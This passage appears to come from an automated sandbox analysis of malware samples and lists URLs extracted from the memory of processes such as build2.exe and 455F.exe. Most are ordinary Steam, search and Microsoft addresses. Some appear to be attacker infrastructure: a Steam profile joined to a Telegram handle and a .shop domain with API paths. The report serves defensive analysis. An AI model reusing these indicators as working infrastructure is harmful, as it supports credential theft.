Source: build2.exe, 00000013.00000003.1903065829.0000000000A26000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.1852406264.0000000000A26000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000002.2287228950.0000000000434000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2114989353.0000000000A21000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000002.2289169200.0000000000A21000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.1837113139.0000000000A26000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.1903386007.0000000000A2B000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.1884071466.0000000000A26000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v=pSv
Source: build2.exe, 00000013.00000003.1903065829.0000000000A26000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.1852406264.0000000000A26000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000002.2287228950.0000000000434000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2114989353.0000000000A21000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000002.2289169200.0000000000A21000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.1837113139.0000000000A26000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.1903386007.0000000000A2B000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.1884071466.0000000000A26000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/javascript/tooltip.js?v=.zYHOpI1L3Rt0
Source: build2.exe, 00000013.00000003.1976258709.0000000000AEB000.00000004.00000020.00020000.00000000.sdmp, 455F.exe, 00000014.00000003.1891265405.0000000003A39000.00000004.00000800.00020000.00000000.sdmp, 455F.exe, 00000014.00000003.1891368898.0000000003A36000.00000004.00000800.00020000.00000000.sdmp, 455F.exe, 00000014.00000003.1891563712.0000000003A36000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: build2.exe, 00000013.00000003.1976258709.0000000000AEB000.00000004.00000020.00020000.00000000.sdmp, 455F.exe, 00000014.00000003.1891265405.0000000003A39000.00000004.00000800.00020000.00000000.sdmp, 455F.exe, 00000014.00000003.1891368898.0000000003A36000.00000004.00000800.00020000.00000000.sdmp, 455F.exe, 00000014.00000003.1891563712.0000000003A36000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: build2.exe, 00000013.00000003.1976258709.0000000000AEB000.00000004.00000020.00020000.00000000.sdmp, 455F.exe, 00000014.00000003.1891265405.0000000003A39000.00000004.00000800.00020000.00000000.sdmp, 455F.exe, 00000014.00000003.1891368898.0000000003A36000.00000004.00000800.00020000.00000000.sdmp, 455F.exe, 00000014.00000003.1891563712.0000000003A36000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: explorer.exe, 00000027.00000003.2051835284.00000000092B3000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000027.00000003.2055909414.00000000092B3000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000027.00000003.2059945515.00000000092B3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://excel.office.com
Source: explorer.exe, 00000002.00000000.1435191718.000000000D1D6000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://excel.office.comE
Source: build2.exe, 00000013.00000003.1814129408.0000000000A2C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://help.steampowered.com/
Source: build2.exe, 00000013.00000003.1903065829.0000000000A26000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.1852406264.0000000000A26000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000002.2287228950.0000000000434000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2114989353.0000000000A21000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000002.2289169200.0000000000A21000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.1837113139.0000000000A26000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.1903386007.0000000000A2B000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.1884071466.0000000000A26000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.1817467359.0000000000A1F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://help.steampowered.com/en/
Source: explorer.exe, 00000027.00000003.2002401471.00000000048F2000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000027.00000002.2625226237.00000000048BA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA15G9PH.img
Source: explorer.exe, 00000027.00000003.2002401471.00000000048F2000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000027.00000002.2625226237.00000000048BA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA1hJkDs.img
Source: explorer.exe, 00000027.00000003.2002401471.00000000048F2000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000027.00000002.2625226237.00000000048BA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBNvr53.img
Source: build2.exe, 00000013.00000003.1814129408.0000000000A2C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.steampowered.com/
Source: build2.exe, 00000013.00000003.1817467359.0000000000A2C000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.1814129408.0000000000A2C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://lv.queniujq.cn
Source: build2.exe, 00000013.00000003.1817467359.0000000000A2C000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.1814129408.0000000000A2C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://medal.tv
Source: build2.exe, 00000013.00000003.2114848022.0000000000AA4000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2021277543.0000000000AA4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://mozilla.org0/
Source: explorer.exe, 00000002.00000000.1435191718.000000000D1D6000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://outlook.comNaP0B
Source: explorer.exe, 00000027.00000003.2051835284.00000000092B3000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000027.00000003.2055909414.00000000092B3000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000027.00000003.2059945515.00000000092B3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://outlook.comy
Source: build2.exe, 00000013.00000003.1817467359.0000000000A2C000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.1814129408.0000000000A2C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://player.vimeo.com
Source: explorer.exe, 00000002.00000000.1435191718.000000000CFF4000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://powerpoint.office.comcemberZ
Source: build2.exe, 00000013.00000003.1817467359.0000000000A2C000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.1814129408.0000000000A2C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://recaptcha.net
Source: build2.exe, 00000013.00000003.1817467359.0000000000A2C000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.1814129408.0000000000A2C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://recaptcha.net/recaptcha/;
Source: 455F.exe, 00000014.00000002.2020805404.0000000001565000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://resergvearyinitiani.shop/
Source: 455F.exe, 00000014.00000003.1994160250.0000000001561000.00000004.00000020.00020000.00000000.sdmp, 455F.exe, 00000014.00000002.2020805404.0000000001565000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://resergvearyinitiani.shop/-
Source: 455F.exe, 00000014.00000003.1941788146.000000000158F000.00000004.00000020.00020000.00000000.sdmp, 455F.exe, 00000014.00000003.1922414823.0000000001588000.00000004.00000020.00020000.00000000.sdmp, 455F.exe, 00000014.00000003.1920962166.0000000001588000.00000004.00000020.00020000.00000000.sdmp, 455F.exe, 00000014.00000003.1935589786.000000000158F000.00000004.00000020.00020000.00000000.sdmp, 455F.exe, 00000014.00000003.1935685617.000000000158F000.00000004.00000020.00020000.00000000.sdmp, 455F.exe, 00000014.00000003.1922483525.000000000158E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://resergvearyinitiani.shop/TO
Source: 455F.exe, 00000014.00000002.2019271007.00000000014FE000.00000004.00000020.00020000.00000000.sdmp, 455F.exe, 00000014.00000003.1889817325.00000000014FE000.00000004.00000020.00020000.00000000.sdmp, 455F.exe, 00000014.00000003.1869661702.00000000014FE000.00000004.00000020.00020000.00000000.sdmp, 455F.exe, 00000014.00000003.1878385567.0000000001500000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://resergvearyinitiani.shop/api
Source: 455F.exe, 00000014.00000003.1994160250.0000000001561000.00000004.00000020.00020000.00000000.sdmp, 455F.exe, 00000014.00000002.2020805404.0000000001565000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://resergvearyinitiani.shop/apiL
Source: 455F.exe, 00000014.00000003.1869661702.00000000014FE000.00000004.00000020.00020000.00000000.sdmp, 455F.exe, 00000014.00000003.1878385567.0000000001500000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://resergvearyinitiani.shop/apiR
Source: 455F.exe, 00000014.00000003.1994160250.0000000001561000.00000004.00000020.00020000.00000000.sdmp, 455F.exe, 00000014.00000002.2020805404.0000000001565000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://resergvearyinitiani.shop/lc
Source: 455F.exe, 00000014.00000003.1889817325.00000000014FE000.00000004.00000020.00020000.00000000.sdmp, 455F.exe, 00000014.00000003.1869661702.00000000014FE000.00000004.00000020.00020000.00000000.sdmp, 455F.exe, 00000014.00000003.1878385567.0000000001500000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://resergvearyinitiani.shop:443/api
Source: build2.exe, 00000013.00000003.1817467359.0000000000A2C000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.1814129408.0000000000A2C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://s.ytimg.com;
Source: build2.exe, 00000013.00000003.1817467359.0000000000A2C000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.1814129408.0000000000A2C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://sketchfab.com
Source: build2.exe, 00000013.00000003.1817467359.0000000000A2C000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.1814129408.0000000000A2C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steam.tv/
Source: build2.exe, 00000013.00000003.1817467359.0000000000A2C000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.1814129408.0000000000A2C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steambroadcast-test.akamaized.net
Source: build2.exe, 00000013.00000003.1817467359.0000000000A2C000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.1814129408.0000000000A2C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steambroadcast.akamaized.net
Source: build2.exe, 00000013.00000003.1817467359.0000000000A2C000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.1814129408.0000000000A2C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steambroadcastchat.akamaized.net
Source: build2.exe, 00000013.00000003.1817467359.0000000000A1F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2114989353.00000000009F9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/
Source: build2.exe, 00000013.00000002.2287228950.0000000000434000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2114989353.0000000000A21000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000002.2289169200.0000000000A21000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.1837113139.0000000000A26000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.1903386007.0000000000A2B000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.1884071466.0000000000A26000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.1817467359.0000000000A1F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/?subsection=broadcasts
Source: build2.exe, 00000013.00000003.1903065829.0000000000A26000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.1852406264.0000000000A26000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000002.2287228950.0000000000434000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2114989353.0000000000A21000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000002.2289169200.0000000000A21000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.1837113139.0000000000A26000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.1903386007.0000000000A2B000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.1884071466.0000000000A26000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.1817467359.0000000000A1F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/discussions/
Source: build2.exe, 00000013.00000002.2289169200.00000000009F9000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.1903214335.0000000000A02000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.1885551963.0000000000A02000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.1837286837.0000000000A02000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2114989353.00000000009F9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/l
Source: build2.exe, 00000013.00000003.1837286837.0000000000A13000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.1903065829.0000000000A26000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.1852406264.0000000000A26000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2114989353.0000000000A21000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000002.2289169200.0000000000A21000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.1837113139.0000000000A26000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.1903386007.0000000000A2B000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.1884071466.0000000000A26000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org
Source: build2.exe, 00000013.00000003.1884071466.0000000000A26000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.1817467359.0000000000A1F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/login/home/?goto=profiles%2F76561199662282318
Source: build2.exe, 00000013.00000003.1903065829.0000000000A26000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.1852406264.0000000000A26000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000002.2287228950.0000000000434000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2114989353.0000000000A21000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000002.2289169200.0000000000A21000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.1837113139.0000000000A26000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.1903386007.0000000000A2B000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.1884071466.0000000000A26000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.1817467359.0000000000A1F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/market/
Source: build2.exe, 00000013.00000003.1903065829.0000000000A26000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.1852406264.0000000000A26000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000002.2287228950.0000000000434000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2114989353.0000000000A21000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000002.2289169200.0000000000A21000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.1837113139.0000000000A26000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.1903386007.0000000000A2B000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.1884071466.0000000000A26000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.1817467359.0000000000A1F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/my/wishlist/
Source: build2.exe, 00000013.00000003.1837113139.0000000000A26000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.1903386007.0000000000A2B000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.1885551963.0000000000A02000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.1837286837.0000000000A02000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.1884071466.0000000000A26000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2114989353.00000000009F9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/profiles/76561199662282318
Source: build2.exe, 00000013.00000003.1903065829.0000000000A26000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.1852406264.0000000000A26000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000002.2287228950.0000000000434000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2114989353.0000000000A21000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000002.2289169200.0000000000A21000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.1837113139.0000000000A26000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.1903386007.0000000000A2B000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.1884071466.0000000000A26000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.1817467359.0000000000A1F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/profiles/76561199662282318/badges
Source: build2.exe, 00000013.00000003.1903065829.0000000000A26000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.1852406264.0000000000A26000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000002.2287228950.0000000000434000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2114989353.0000000000A21000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000002.2289169200.0000000000A21000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.1837113139.0000000000A26000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.1903386007.0000000000A2B000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.1884071466.0000000000A26000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.1817467359.0000000000A1F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/profiles/76561199662282318/inventory/
Source: build2.exe, 00000012.00000002.1803333267.0000000000A00000.00000040.00001000.00020000.00000000.sdmp, build2.exe, 00000013.00000002.2287228950.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/profiles/76561199662282318https://t.me/t8jmhlCristina
Source: build2.exe, 00000013.00000003.1903065829.0000000000A26000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.1852406264.0000000000A26000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000002.2287228950.0000000000434000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2114989353.0000000000A21000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000002.2289169200.0000000000A21000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.1837113139.0000000000A26000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.1903386007.0000000000A2B000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.1884071466.0000000000A26000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.1817467359.0000000000A1F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/workshop/
Source: build2.exe, 00000013.00000003.1817467359.0000000000A1F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/
Source: build2.exe, 00000013.00000003.1817467359.0000000000A2C000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.1814129408.0000000000A2C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/;
Source: build2.exe, 00000013.00000003.1817467359.0000000000A1F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/about/
Source: build2.exe, 00000013.00000003.1903065829.0000000000A26000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.1852406264.0000000000A26000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000002.2287228950.0000000000434000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2114989353.0000000000A21000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000002.2289169200.0000000000A21000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.1837113139.0000000000A26000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.1903386007.0000000000A2B000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.1884071466.0000000000A26000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.1817467359.0000000000A1F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/explore/
Source: build2.exe, 00000013.00000003.1903065829.0000000000A26000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.1852406264.0000000000A26000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2114989353.0000000000A21000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000002.2289169200.0000000000A21000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.1837113139.0000000000A26000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.1903386007.0000000000A2B000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.1884071466.0000000000A26000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.1817467359.0000000000A1F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/legal/
Source: build2.exe, 00000013.00000003.1903065829.0000000000A26000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.1852406264.0000000000A26000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000002.2287228950.0000000000434000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2114989353.0000000000A21000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000002.2289169200.0000000000A21000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.1837113139.0000000000A26000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.1903386007.0000000000A2B000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.1884071466.0000000000A26000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.1817467359.0000000000A1F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/mobile
Source: build2.exe, 00000013.00000003.1903065829.0000000000A26000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.1852406264.0000000000A26000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000002.2287228950.0000000000434000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2114989353.0000000000A21000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000002.2289169200.0000000000A21000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.1837113139.0000000000A26000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.1903386007.0000000000A2B000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.1884071466.0000000000A26000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.1817467359.0000000000A1F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/news/
Source: build2.exe, 00000013.00000003.1903065829.0000000000A26000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.1852406264.0000000000A26000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000002.2287228950.0000000000434000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2114989353.0000000000A21000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000002.2289169200.0000000000A21000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.1837113139.0000000000A26000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.1903386007.0000000000A2B000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.1884071466.0000000000A26000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.1817467359.0000000000A1F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/points/shop/
Source: build2.exe, 00000013.00000003.1903065829.0000000000A26000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.1852406264.0000000000A26000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000002.2287228950.0000000000434000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2114989353.0000000000A21000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000002.2289169200.0000000000A21000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.1837113139.0000000000A26000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.1903386007.0000000000A2B000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.1884071466.0000000000A26000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.1817467359.0000000000A1F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/privacy_agreement/
Source: build2.exe, 00000013.00000003.1903065829.0000000000A26000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.1852406264.0000000000A26000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000002.2287228950.0000000000434000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2114989353.0000000000A21000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000002.2289169200.0000000000A21000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.1837113139.0000000000A26000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.1903386007.0000000000A2B000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.1884071466.0000000000A26000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.1817467359.0000000000A1F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/stats/
Source: build2.exe, 00000013.00000003.1903065829.0000000000A26000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.1852406264.0000000000A26000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000002.2287228950.0000000000434000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2114989353.0000000000A21000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000002.2289169200.0000000000A21000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.1837113139.0000000000A26000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.1903386007.0000000000A2B000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.1884071466.0000000000A26000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.1817467359.0000000000A1F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/steam_refunds/
